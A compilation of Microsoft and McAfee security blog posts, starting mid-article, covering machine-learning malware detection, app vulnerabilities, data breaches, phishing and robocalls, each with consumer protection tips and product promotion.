LockerGoga, a strain of ransomware that’s known for being used in targeted attacks, is another example of malware that uses digital certificates. LockerGoga emerged in early 2019 and has been used by attackers in high-profile campaigns that targeted organizations in the industrial sector. Once attackers are able breach a target network, they use LockerGoga to encrypt enterprise data en masse and demand ransom.

Figure 3. LockerGoga variant digitally code-signed with a trusted CA

When Microsoft Defender ATP encounters a new threat like LockerGoga, the client sends a featurized description of the file to the cloud protection service for real-time classification. An array of machine learning classifiers processes the features describing the content, including whether attackers had digitally code-signed the malware with a trusted code-signing certificate that chains to a trusted CA. By ignoring certificates and other clean features, monotonic models in Microsoft Defender ATP can correctly identify attacks that otherwise would have slipped through defenses.

Very recently, researchers demonstrated an adversarial attack that appends a large volume of clean strings from a computer game executable to several well-known malware and credential dumping tools – essentially adding clean features to the malicious files – to evade detection. The researchers showed how this technique can successfully impact machine learning prediction scores so that the malware files are not classified as malware. The monotonic model hardening that we’ve deployed in Microsoft Defender ATP is key to preventing this type of attack, because, for a monotonic classifier, adding features to a file can only increase the malicious score.

Given how they significantly harden defenses, monotonic models are now standard components of machine learning protections in Microsoft Defender ATP‘s Antivirus. One of our monotonic models uniquely blocks malware on an average of 200,000 distinct devices every month. We now have three different monotonic classifiers deployed, protecting against different attack scenarios.

Monotonic models are just the latest enhancements to Microsoft Defender ATP’s Antivirus. We continue to evolve machine learning-based protections to be more resilient to adversarial attacks. More effective protections against malware and other threats on endpoints increases defense across the entire Microsoft Threat Protection. By unifying and enabling signal-sharing across Microsoft’s security services, Microsoft Threat Protection secures identities, endpoints, email and data, apps, and infrastructure.

 

Geoff McDonald (@glmcdona),Microsoft Defender ATP Research team
with Taylor Spangler, Windows Data Science team

 

 


Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Follow us on Twitter @MsftSecIntel.

The post New machine learning model sifts through the good to unearth the bad in evasive malware appeared first on Microsoft Security.

4 Ways for Parents to Handle the Facebook Messenger Bug

9 out of 10 children in the U.S. between the ages of six and twelve have access to smart devices. And while parents know it’s important for their children to learn to use technology in today’s digital world, 75% want more visibility into their kids’ digital activities. This is precisely why Facebook designed Messenger Kids to empower parents to monitor their children’s safety online. However, the popular social media platform had to recently warn users of a security issue within this app for kids.

The central benefit of Messenger Kids is that children can only chat with other users their parents approve of. Yet one design flaw within the group chat feature prevented Facebook from upholding this rule. Children who started a group chat could include any of their approved connections in the conversation, even if a user was not authorized to message the other kids in the chat. As a result, thousands of children were able to connect with users their parents weren’t aware of via this flaw.

Luckily, Facebook removed the unauthorized group chats and flagged the issue to all affected users, promising that that potentially unsafe chats won’t happen again. While Facebook has not yet made a formal public response, they confirmed the bug to The Verge:

“We recently notified some parents of Messenger Kids account users about a technical error that we detected affecting a small number of group chats. We turned off the affected chats and provided parents with additional resources on Messenger Kids and online safety.”

Now, Facebook is currently working on still resolving the bug itself. However, there are still many actions parents can take to ensure that their child is safe on Facebook Messenger, and social media apps in general. Start by following these four best practices to secure your kid’s online presence:

  • Turn on automatic app updates on your child’s device. Updates usually include new and improved app features that your child will be excited to try. But more importantly, they tend to account for security bugs. Delaying updates can leave apps vulnerable to cybercriminals and turning on automatic app updates ensures that you don’t have to worry about missing one.
  • Get educated. Some parents find it helpful to use the same apps as their child to better understand how it works and what safety threats might be relevant. Facebook also offers resources online that provide guidance for staying safe, such as how and when to block a user and what kind of content is or isn’t risky to share. Additionally, it’s always a best practice to read the terms and conditions of an app before downloading to make sure you’re aware of what your child is signing up for.
  • Keep an open dialogue about online safety. It’s important to discuss your child’s online activities with them and walk them through best internet practices, such as changing passwords every so often and not clicking on links from unknown sources. That way, they’ll be better prepared for potential cyberthreats. Making the internet a part of the conversion will also help your child feel comfortable coming to you about things they might be skeptical about online.
  • Consider leveraging a security solution with parental controls. Depending on your child’s age and how much of a window you want into their online behaviors, you can leverage a solution such as McAfee Safe Family that can be helpful for creating a safe online environment. You can block certain websites and create predefined rules, which will help prevent your child from sharing comprising information.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Ways for Parents to Handle the Facebook Messenger Bug appeared first on McAfee Blogs.

Downloaded FaceApp? Here’s How Your Privacy Is Now Affected

If you’ve been on social media recently, you’ve probably seen some people in your feed posting images of themselves looking elderly. That’s because FaceApp, an AI face editor that went viral in 2017, is making a major comeback with the so-called FaceApp Challenge — where celebrities and others use the app’s old age filter to add decades onto their photos. While many folks have participated in the fun, there are some concerns about the way that the app operates when it comes to users’ personal privacy.

According to Forbes, over 100,000 million people have reportedly downloaded FaceApp from the Google Play Store and the app is the number one downloaded app on the Apple App Store in 121 different countries. But what many of these users are unaware of is that when they download the app, they are granting FaceApp full access to the photos they have uploaded. The company can then use these photos for their benefit, such as training their AI facial recognition algorithm. And while there is currently nothing to indicate that the app is taking photos for malicious intent, it is important for users to be aware that their personal photos may be used for other purposes beyond the original intent.

So, how can users enjoy the entertainment of apps like FaceApp without sacrificing their privacy? Follow these tips to help keep your personal information secure:

  • Think before you upload. It’s always best to err on the side of caution with any personal data and think carefully about what you are uploading or sharing. A good security practice is to only share personal data, including personal photos, when it’s truly necessary.
  • Update your settings. If you’re concerned about FaceApp having permission to access your photos, it’s time to assess the tools on your smartphone. Check which apps have access to information like your photos and location data. Change permissions by either deleting the app or changing your settings on your device.
  • Understand and read the terms. Consumers can protect their privacy by reading the Privacy Policy and terms of service and knowing who they are dealing with.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Downloaded FaceApp? Here’s How Your Privacy Is Now Affected appeared first on McAfee Blogs.

Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware

With over 2.5 billion monthly active users that have accumulated since its fruition, Android has seen massive growth over the last 10 years. With so many users, it’s no wonder why cybercriminals continuously look to exploit Android devices. In fact, 25 million Android users have recently been hit with a new malware.

Dubbed Agent Smith, this cyberthreat sneaks onto a user’s device when the user downloads a malicious app from the app store, like a photo utility or game app. The app then silently installs the malware disguised as a legitimate Google updating tool. However, no updating icon appears on the screen, making the user oblivious to their device being in danger. Once installed, the malware replaces legitimate apps on the user’s phone, such as WhatsApp, with an evil update that serves bad ads. According to security researchers, the ads themselves aren’t malicious. But if a victim accidentally clicks on the ad, the hackers can make money from these ad fraud schemes. What’s more, there’s potential that these bad ads aren’t limited to just WhatsApp and could be found on other platforms as well.

So, what can Android users do to prevent this malware from sneaking onto their device? Check out the following tips to help stay secure:

  • Be wary of WhatsApp ads. Android users should take action if they experience advertisements displayed at strange times, such as when they open WhatsApp. The legitimate WhatsApp does not serve ads, so if you experience ads on this platform your device might have been infected.
  • Look out for suspicious apps. Check the apps and notifications section of your Android settings. If you see suspicious apps with names such as Google Updater, Google Installer for U, Google Powers, and Google Installer, uninstall these apps right away.
  • Stay away from unofficial Android stores. Google has extra precautions designed to prevent malware from getting onto the official Android store website, so only downloading apps from there could help protect you.
  • Use a security solution. A solution like McAfee Mobile Security can help Android users stay protected from threats like mobile malware. It also provides a free antivirus cleaner and phone security app to protect your online privacy and enhance device performance.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your WhatsApp Being Weird? You May Need to Check For Hidden Malware appeared first on McAfee Blogs.

Watch Your Webcam: Tips to Protect Your Mac From Zoom Hackers

You’ve probably heard of the popular video conferencing platform, Zoom. This platform enables its millions of users in various locations to virtually meet face to face. In an effort to enhance user experience and work around changes in Safari 12, Zoom installed a web server that allows users to enjoy one-click-to-join meetings. Unfortunately, a security researcher recently disclosed that this product feature acts as a flaw that could allow cybercriminals to activate a Mac user’s webcam without their permission.

How exactly does this vulnerability work? Cybercriminals are able to exploit a feature that allows users to send a meeting link directly to a recipient. When the recipient clicks on the link, they are automatically launched into the video conferencing software. If the user has previously installed the Zoom app onto their Mac and hasn’t turned off their camera for meetings, Zoom will auto-join the user to a conference call with the camera on. With this flaw, an attacker can send a victim a meeting link via email message or web server, allowing them to look into a victim’s room, office, or wherever their camera is pointing. It’s important to note that even if a user has deleted the Zoom app from their device, the Zoom web server remains, making the device susceptible to this vulnerability.

While the thought of someone unknowingly accessing a user’s Mac camera is creepy, this vulnerability could also result in a Denial of Service (DoS) attack by overwhelming a user’s device with join requests. And even though this patch has been successfully patched by Zoom, it’s important for users to realize that this update is not enforced by the platform. So, how can Zoom users avoid getting sucked into a potentially malicious call? Check out these security tips to stay secure on conference calls:

  • Adjust your Zoom settings. Users can disable the setting that allows Zoom to turn your camera on when joining a meeting. This will prevent a hacker from accessing your camera if you are sent a suspicious meeting link.
  • Update, update, update. Be sure to manually install the latest Zoom update to prevent DoS or other potential attacks. Additionally, Zoom will introduce an update in July that allows users to apply video preferences from their first call to all future calls. This will ensure that if a user joins their first meeting without video, this setting will remain consistent for all other calls.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Watch Your Webcam: Tips to Protect Your Mac From Zoom Hackers appeared first on McAfee Blogs.

Evolved IoT Linux Worm Targets Users’ Devices

Since the early ‘90s, Linux has been a cornerstone of computer operating systems. Today, Linux is everywhere — from smartphones and streaming devices to smart cars and refrigerators. This operating system has been historically less susceptible to malware, unlike its contemporaries such as Windows or Mac OS. However, the widespread adoption of IoT devices has changed that, as security vulnerabilities within Linux have been found over time. These flaws have been both examined by researchers in order to make repairs and also exploited by hackers in order to cause disruption.

As recently as last month, a new strain of a Linux bricking worm appeared, targeting IoT devices– like tablets, wearables, and other multimedia players. A bricking worm is a type of malware that aims to permanently disable the system it infects. This particular strain, dubbed Silex, was able to break the operating systems of at least 4,000 devices. By targeting unsecured IoT devices running on Linux, or Unix configurations, the malware went to work. It quickly rendered devices unusable by trashing device storage, as well as removing firewalls and other network configurations. With this threat, many users will initially think their IoT device is broken, when really it is momentarily infected. To resolve the issue, users must manually download and reinstall the device’s firmware, which can be a time consuming and difficult task. And while this incident is now resolved, Silex serves as a cautionary tale to users and manufacturers alike as IoT devices continue to proliferate almost every aspect of everyday life.

With an estimated 75.4 billion IoT connected devices installed worldwide by 2025, it’s important for users to remain focused on securing all their devices. Consider these tips to up your personal device security:

  • Keep your security software up-to-date. Software and firmware patches are always being released by companies. These updates are made to combat newly discovered vulnerabilities, so be sure to update every time you’re prompted to.
  • Pay attention to the news. With more and more information coming out around vulnerabilities and flaws, companies are more frequently sending out updates for IoT devices. While these should come to you automatically, be sure to pay attention to what is going on in the space of IoT security to ensure you’re always in the know.
  • Change your device’s factory security settings. When it comes to IoT products, many manufacturers aren’t thinking “security first.” A device may be vulnerable as soon as the box is opened, and many cybercriminals know how to get into vulnerable IoT devices via default settings. By changing the factory settings, you are instantly upgrading your device’s security.
  • Use best practices for linked accounts. If you connect a service that leverages a credit card, protect that linked service account with strong passwords and two-factor authentication (2FA) where possible. In addition, pay attention to notification emails, especially those regarding new orders for goods or services. If you notice suspicious activity, act accordingly.
  • Set up a separate IoT network. Consider setting up a second network for your IoT devices that doesn’t share access with your other devices and data. You can check your router manufacturer’s website to learn how. You may also want to add another network for guests and their devices.
  • Get security at the start. Lastly, consider getting a router with built-in security features to make it easier to protect all the devices in your home from one place.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Evolved IoT Linux Worm Targets Users’ Devices appeared first on McAfee Blogs.

Is Your Smart Home Secure? 5 Tips to Help You Connect Confidently

With so many smart home devices being used today, it’s no surprise that users would want a tool to help them manage this technology. That’s where Orvibo comes in. This smart home platform helps users manage their smart appliances such as security cameras, smart lightbulbs, thermostats, and more. Unfortunately, the company left an Elasticsearch server online without a password, exposing billions of user records.

The database was found in mid-June, meaning it’s been exposed to the internet for two weeks. The database appears to have cycled through at least two billion log entries, each containing data about Orvibo SmartMate customers. This data includes customer email addresses, the IP address of the smart home devices, Orvibo usernames, and hashed passwords.

 

More IoT devices are being created every day and we as users are eager to bring them into our homes. However, device manufacturers need to make sure that they are creating these devices with at least the basic amount of security protection so users can feel confident utilizing them. Likewise, it’s important for users to remember what risks are associated with these internet-connected devices if they don’t practice proper cybersecurity hygiene. Taking the time to properly secure your devices can mean the difference between a cybercriminal accessing your home network or not. Check out these tips to help you remain secure when using your IoT devices:

  • Research before you buy. Although you might be eager to get the latest device, some are made more secure than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks these features, consider upgrading.
  • Safeguard your devices. Before you connect a new IoT device to your network, be sure to change the default username and password to something strong and unique. Hackers often know the default settings of various IoT devices and share them online for others to expose. Turn off other manufacturer settings that don’t benefit you, like remote access, which could be used by cybercriminals to access your system.
  • Update, update, update. Make sure that your device software is always up-to-date. This will ensure that you’re protected from any known vulnerabilities. For some devices, you can even turn on automatic updates to ensure that you always have the latest software patches installed.
  • Secure your network. Just as it’s important to secure your actual device, it’s also important to secure the network it’s connected to. Help secure your router by changing its default name and password and checking that it’s using an encryption method to keep communications secure. You can also look for home network routers or gateways that come embedded with security software like McAfee Secure Home Platform.
  • Use a comprehensive security solution. Use a solution like McAfee Total Protection to help safeguard your devices and data from known vulnerabilities and emerging threats.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Is Your Smart Home Secure? 5 Tips to Help You Connect Confidently appeared first on McAfee Blogs.

#Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account

If you’re an avid Instagram user, chances are you’ve come across some accounts with a little blue checkmark next to the username. This little blue tick is Instagram’s indication that the account is verified. While it may seem insignificant at first glance, this badge actually means that Instagram has confirmed that the account is an authentic page of a public figure, celebrity, or global brand. In today’s world of social media influencers, receiving a verified badge is desirable so other users know you’re a significant figure on the platform. However, cybercriminals are taking advantage of the appeal of being Instagram verified as a way to convince users to hand over their credentials.

So, how do cybercriminals carry out this scheme? According to security researcher Luke Leal, this scam was distributed as a phishing page through Instagram. The page resembled a legitimate Instagram submission page, prompting victims to apply for verification. After clicking on the “Apply Now” button, victims were taken to a series of phishing forms with the domain “Instagramforbusiness[.]info.” These forms asked users for their Instagram logins as well as confirmation of their email and password credentials. However, if the victim submitted the form, their Instagram credentials would make their way into the cybercriminal’s email inbox. With this information, the cybercrooks would have unauthorized access to the victim’s social media page. What’s more, since this particular phishing scam targets a user’s associated email login, hackers would have the capability of resetting and verifying ownership of the victim’s account.

Whether you’re in search of an Instagram verification badge or not, it’s important to be mindful of your cybersecurity. And with Social Media Day right around the corner, check out these tips to keep your online profiles protected from phishing and other cyberattacks:

  • Exercise caution when inspecting links. If you examine the link used for this scam (Instagramforbusiness[.]info), you can see that it is not actually affiliated with Instagram.com. Additionally, it doesn’t use the secure HTTPS protocol, indicating that it is a risky link. Always inspect a URL before you click on it. And if you can’t tell whether a link is malicious or not, it’s best to avoid interacting with it altogether.
  • Don’t fall for phony pages. If you or a family member is in search of a verified badge for their Instagram profile, make sure they are familiar with the process. Instagram users should go into their own account settings and click on “Request on verification” if they are looking to become verified. Note that Instagram will not ask for your email or password during this process, but will send you a verification link via email instead.
  • Reset your password. If you suspect that a hacker is attempting to gain control of your account, play it safe by resetting your password.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post #Verified or Phishing Victim? 3 Tips to Protect Your Instagram Account appeared first on McAfee Blogs.

Process Reimaging: A Cybercrook’s New Disguise for Malware

As of early 2019, Windows 10 is running on more than 700 million devices, including PCs, tablets, phones, and even some gaming consoles. However, it turns out the widespread Windows operating system has some inconsistencies as to how it specifically determines process image file locations on disk. Our McAfee Advanced Threat Research team decided to analyze these inconsistencies and as a result uncovered a new cyberthreat called process reimaging. Similar to process doppelganging and process hollowing, this technique evades security measures, but with greater ease since it doesn’t require code injection. Specifically, this technique affects the ability for a Windows endpoint security solution to detect whether a process executing on the system is malicious or benign, allowing a cybercrook to go about their business on the device undetected.

Let’s dive into the details of this threat. Process reimaging leverages built-in Windows APIs, or application programming interfaces, which allow applications and the operating system to communicate with one another. One API dubbed K32GetProcessImageFileName allows endpoint security solutions, like Windows Defender, to verify whether an EXE file associated with a process contains malicious code. However, with process reimaging, a cybercriminal could subvert the security solution’s trust in the windows operating system APIs to display inconsistent FILE_OBJECT names and paths. Consequently, Windows Defender misunderstands which file name or path it is looking at and can no longer tell if a process is trustworthy or not. By using this technique, cybercriminals can persist malicious processes executing on a user’s device without them even knowing it.

So, the next question is — what can Windows users do to protect themselves from this potential threat? Check out these insights to help keep your device secure:

  • Update your software. Microsoft has issued a partial fix that stops cybercriminals from exploiting file names to disguise malicious code, which helps address at least part of the issue for Windows Defender only. And while file paths are still viable for exploitation, it’s worth updating your software regularly to ensure you always have the latest security patches, as this is a solid practice to work into your cybersecurity routine.
  • Work with your endpoint security vendor. To help ensure you’re protected from this threat, contact your endpoint security provider to see if they protect against process reimaging.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Process Reimaging: A Cybercrook’s New Disguise for Malware appeared first on McAfee Blogs.

3 Tips Venmo Users Should Follow to Keep Their Transactions Secure

You’ve probably heard of Venmo, the quick and convenient peer-to-peer mobile payments app. From splitting the check when eating out with friends to dividing the cost of bills, Venmo is an incredibly easy way to share money. However, users’ comfort with the app can sometimes result in a few negligent security practices. In fact, computer science student Dan Salmon recently scraped seven million Venmo transactions to prove that users’ public activity can be easily obtained if they don’t have the right security settings flipped on. Let’s explore his findings.

By scraping the company’s developer API, Salmon was able to download millions of transactions across a six-month span. That means he was able to see who sent money to who, when they sent it, and why – just as long as the transaction was set to “public.” Mind you, Salmon’s download comes just a year after that of a German researcher, who downloaded over 200 million transactions from the public-by-default app last year.

These data scrapes, if anything, act as a demonstration. They prove to users just how crucial it is to set up online mobile payment apps with caution and care. Therefore, if you’re a Venmo or other mobile payment app user, make sure to follow these tips in order to keep your information secure:

  • Set your settings to “private” immediately. Only the sender and receiver should know about a monetary transaction in the works. So, whenever you go to send money on Venmo or any other mobile payment app, make sure the transaction is set to “private.” For Venmo users specifically, you can flip from “public” to “private” by just toggling the setting at the bottom right corner of main “Pay or Request” page.
  • Limit the amount of data you share. Just because something is designed to be social doesn’t mean it should become a treasure trove of personal data. No matter the type of transaction you’re making, always try to limit the amount of personal information you include in the corresponding message. That way, any potential cybercriminals out there won’t be able to learn about your spending habits.
  • Add on extra layers of security. Beyond flipping on the right in-app security settings, it’s important to take any extra precautions you can when it comes to protecting your financial data. Create complex logins to your mobile payment apps, participate in biometric options if available, and ensure your mobile device itself has a passcode as well. This will all help ensure no one has access to your money but you.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 3 Tips Venmo Users Should Follow to Keep Their Transactions Secure appeared first on McAfee Blogs.

Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel

With summertime just around the corner, families are eagerly looking to book their next getaway. Since vacation is so top-of-mind during the summer months, users are bound to come across websites offering cheap deals on flights, accommodations, and other experiences and activities. With so many websites claiming to offer these “can’t-miss deals,” how do you know who to trust?

It turns out that this is a common concern among folks looking for a little summer getaway. According to our recent survey of 8,000 people across the UK, US, Canada, Australia, France, Germany, Spain, and Singapore, 54% of respondents worry about their identity being stolen while booking and purchasing travel and accommodation online. However, 27% don’t check the authenticity of a website before booking their vacation online. Over half of these respondents say that it doesn’t cross their minds to do so.

These so-called “great deals” can be difficult to pass up. Unfortunately, 30% of respondents have been defrauded thanks to holiday travel deals that were just too good to be true. What’s more, 46.3% of these victims didn’t realize they had been ripped off until they arrived at their holiday rental to find that the booking wasn’t actually valid.

In addition to avoiding bogus bookings, users should also refrain from risky online behavior while enjoying their summer holidays. According to our survey, 44.5% of respondents are putting themselves at risk while traveling by not checking the security of their internet connection or willingly connecting to an unsecured network. 61% also stated that they never use a VPN, while 22% don’t know what a VPN is.

Unfortunately, travel-related attacks aren’t limited to just travelers either; hotels are popular targets for cybercriminals. According to analysis conducted by the McAfee Advanced Threat Research team, the most popular attack vectors are POS malware and account hijacking. Due to these attacks, eager vacationers have had their customer payment, credit card data, and personally identifiable information stolen. In order for users to enjoy a worry-free vacation this summer, it’s important that they are aware of the potential cyberthreats involved when booking their trips online and what they can do to prevent them.

We here at McAfee are working to help inform users of the risks they face when booking through unsecured or unreliable websites as well as when they’re enjoying some summertime R&R. Check out the following tips so you can enjoy your vacation without questioning the status of your cybersecurity:

  • Always connect with caution. If you need to conduct transactions on a public Wi-Fi connection, use a virtual private network (VPN) to help keep your connection secure.
  • Think before you click. Often times, cybercriminals use phishing emails or fake sites to lure consumers into clicking links for products or services that could lead to malware. If you receive an email asking you to click on a link with a suspicious URL, it’s best to avoid interacting with the message altogether.
  • Browse with security protection. Use a comprehensive security solution, like McAfee Total Protection, which includes McAfee WebAdvisor that can help identify malicious websites.
  • Utilize an identity theft solution. With all this personal data floating around online, it’s important to stay aware of any attempts to steal your identity. Use an identity theft solution, such as McAfee Identity Theft Protection, that can help protect personally identifiable information from identity theft and fraud.

And, as always, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Bargain or Bogus Booking? Learn How to Securely Plan Summer Travel appeared first on McAfee Blogs.

1.1M Emuparadise Accounts Exposed in Data Breach

If you’re an avid gamer or know someone who is, you might be familiar with the retro gaming site Emuparadise. This website boasts a large community, a vast collection of gaming music, game-related videos, game guides, magazines, comics, video game translations, and more. Unfortunately, news just broke that Emuparadise recently suffered a data breach in April 2018, exposing the data of about 1.1 million of their forum members.

The operators of the hacked-database search engine, DeHashed, shared this compromised data with the data breach reference site Have I Been Pwned. According to the site’s owner Troy Hunt, the breach impacted 1,131,229 accounts and involved stolen email addresses, IP addresses, usernames, and passwords stored as salted MD5 hashes. Password salting is a process of securing passwords by inputting unique, random data to users’ passwords. However, the MD5 algorithm is no longer considered sufficient for protecting passwords, creating cause for cybersecurity concern.

Emuparadise forced a credential reset after the breach occurred in April 2018. It’s important that users of Emuparadise games take steps to help protect their private information. If you know someone who’s an avid gamer, pass along the following tips to help safeguard their security:

  • Change up your password. If you have an Emuparadise account, you should change up your account password and email password immediately. Make sure the next one you create is strong and unique so it’s more difficult for cybercriminals to crack. Include numbers, lowercase and uppercase letters, and symbols. The more complex your password is, the better!
  • Keep an eye out for sketchy emails and messages. Cybercriminals can leverage stolen information for phishing emails and social engineering scams. If you see something sketchy or from an unknown source in your email inbox, be sure to avoid clicking on any links provided.
  • Check to see if you’ve been affected. If you or someone you know has made an Emuparadise account, use this tool to check if you could have been potentially affected.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 1.1M Emuparadise Accounts Exposed in Data Breach appeared first on McAfee Blogs.

Say So Long to Robocalls

For as long as you’ve had a phone, you’ve probably experienced in one form or another a robocall. These days it seems like they are only becoming more prevalent too. In fact, it was recently reported that robocall scams surged to 85 million globally, up 325% from 2017. While these scams vary by country, the most common type features the impersonation of legitimate organizations — like global tech companies, big banks, or the IRS — with the goal of acquiring user data and money. When a robocall hits, users need to be careful to ensure their personal information is protected.

It’s almost impossible not to feel anxious when receiving a robocall. Whether the calls are just annoying, or a cybercriminal uses the call to scam consumers out of cash or information, this scheme is a big headache for all. To combat robocalls, there has been an uptick in apps and government intervention dedicated to fighting this ever-present annoyance. Unfortunately, things don’t seem to be getting better — while some savvy users are successful at avoiding these schemes, there are still plenty of other vulnerable targets.

Falling into a cybercriminal’s robocall trap can happen for a few reasons. First off, many users don’t know that if they answer a robocall, they may trigger more as a result. That’s because, once a user answers, hackers know there is someone on the other end of the phone line and they have an incentive to keep calling. Cybercriminals also have the ability to spoof numbers, mimic voices, and provide “concrete” background information that makes them sound legitimate. Lastly, it might surprise you to learn that robocalls are actually perfectly legal. It starts to become a grey area, however, when calls come through from predatory callers who are operating on a not-so-legal basis.

While government agencies, like the Federal Communications Commission and Federal Trade Commission, do their part to curb robocalls, the fight to stop robocalls is far from over, and more can always be done. Here are some proactive ways you can say so long to pesky scammers calling your phone.

  1. There’s an app for that. Consider downloading the app Robokiller that will stop robocalls before you even pick up. The app’s block list is constantly updating, so you’re protected.
  2. Let unknown calls go to voicemail. Unless you recognize the number, don’t answer your phone.
  3. Never share personal details over the phone. Unfortunately, there’s a chance that cybercriminals may have previously obtained some of your personal information from other sources to bolster their scheme. However, do not provide any further personal or financial information over the phone, like SSNs or credit card information.
  4. Register for the FCC’s “Do Not Call” list. This can help keep you protected from cybercriminals and telemarketers alike by keeping your number off of their lists.
  5. Consider a comprehensive mobile security platform. Utilize the call blocker capability feature from McAfee Mobile Security. This tool can help reduce the number of calls that come through.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Say So Long to Robocalls appeared first on McAfee Blogs.

4 Tips to Protect Your Information During Medical Data Breaches

As the companies we trust with our data become more digital, it’s important for users to realize how this affects their own cybersecurity. Take your medical care provider, for instance. You walk into a doctor’s office and fill out a form on a clipboard. This information is then transferred to a computer where a patient Electronic Health Record is created or added to. We trust that our healthcare provider has taken the proper precautions to safely store this data. Unfortunately, medical data breaches are on the rise with a 70% increase over the past seven years. In fact, medical testing company LabCorp just announced that it experienced a breach affecting approximately 7.7 million customers.

How exactly did this breach occur? The information was exposed as a result of an issue with a third-party billing collections vendor, American Medical Collection Agency (AMCA). The information exposed includes names, addresses, birth dates, balance information, and credit card or bank account information provided by customers to AMCA. This breach comes just a few days after Quest Diagnostics, another company who worked with AMCA, announced that they too experienced a breach affecting 11.9 million users.

Luckily, LabCorp stated that they do not store or maintain Social Security numbers and insurance information for their customers. Additionally, the company provided no ordered test, lab results, or diagnostic information to AMCA. LabCorp stated that they intend to provide 200,000 affected users with more specific information regarding the breach and offer them with identity protection and credit monitoring services for two years. And after receiving information on the possible security compromise, AMCA took down its web payments page and hired an external forensics firm to investigate the situation.

Medical data is essentially nonperishable in nature, making it extremely valuable to cybercrooks. It turns out that quite a few security vulnerabilities exist in the healthcare industry, such as unencrypted traffic between servers, the ability to create admin accounts remotely, and disclosure of private information. These types of vulnerabilities could allow cybercriminals to access healthcare systems, as our McAfee Labs researchers discovered. If someone with malicious intent did access the system, they would have the ability to permanently alter medical images, use medical research data for extortion, and more.

Cybercriminals are constantly pivoting their tactics and changing their targets in order to best complete their schemes. As it turns out, medical data has become a hot commodity for cybercrooks. According to the McAfee Labs Threats Report from March 2018, the healthcare sector has experienced a 210% increase in publicly disclosed security incidents from 2016 to 2017. The McAfee Advanced Threat Research Team concluded that many of the incidents were caused by failures to comply with security best practices or to address vulnerabilities in medical software.

While medical care providers should do all that they can to ensure the security of their patients, there are steps users can take to help maintain their privacy. If you think your personal or financial information might be affected by the recent breaches, check out the following tips to help keep your personal data secure:

  • Place a fraud alert.If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Freeze your credit.Freezing your credit will make it impossible for criminals to take out loans or open up new accounts in your name. To do this effectively, you will need to freeze your credit at each of the three major credit-reporting agencies (Equifax, TransUnion, and Experian).
  • Consider using identity theft protection.A solution like McAfee Identify Theft Protection will help you to monitor your accounts, alert you of any suspicious activity, and help you to regain any losses in case something goes wrong.
  • Be vigilant about checking your accounts.If you suspect that your personal data has been compromised, frequently check your bank account and credit activity. Many banks and credit card companies offer free alerts that notify you via email or text messages when new purchases are made, if there’s an unusual charge, or when your account balance drops to a certain level. This will help you stop fraudulent activity in its tracks.

And, of course, to stay updated on all of the latest consumer and mobile security threats, follow me and @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post 4 Tips to Protect Your Information During Medical Data Breaches appeared first on McAfee Blogs.

Attention Graphic Designers: It’s Time to Secure Your Canva Credentials

Online graphic design tools are extremely useful when it comes to creating resumes, social media graphics, invitations, and other designs and documents. Unfortunately, these platforms aren’t immune to malicious online activity. Canva, a popular Australian web design service, was recently breached by a malicious hacker, resulting in 139 million user records compromised.

So, how was this breach discovered? The hacker, who goes by the name GnosticPlayers, contacted a security reporter from ZDNet on May 24th and made him aware of the situation. The hacker claims to have stolen data pertaining to 1 billion users from multiple websites. The compromised data from Canva includes names, usernames, email addresses, city, and country information.

Canva claims to securely store all user passwords using the highest standards via a Bcrypt algorithm. Bcrypt is a strong, slow password-hashing algorithm designed to be difficult and time-consuming for hackers to crack since hashing causes one-way encryption. Additionally, each Canva password was salted, meaning that random data was added to passwords to prevent revealing identical passwords used across the platform. According to ZDNet, 61 million users had their passwords encrypted with the Bcrypt algorithm, resulting in 78 million users having their Gmail addresses exposed in the breach.

Canva has notified users of the breach through email and ensured that their payment card and other financial data is safe. However, even if you aren’t a Canva user, it’s important to be aware of what cybersecurity precautions you should take in the event of a data breach. Check out the following tips:

  • Change your passwords. As an added precaution, Canva is encouraging their community of users to change their email and Canva account passwords. If a cybercriminal got a hold of the exposed data, they could gain access to your other accounts if your login credentials were the same across different platforms.
  • Check to see if you’ve been affected. If you’ve used Canva and believe your data might have been exposed, use this tool to check or set an alert to be notified of other potential data breaches.
  • Secure your personal data. Use a security solution like McAfee Identity Theft Protection. If your information is compromised during a breach, Identity Theft Protection helps monitor and keep tabs on your data in case a cybercriminal attempts to use it.

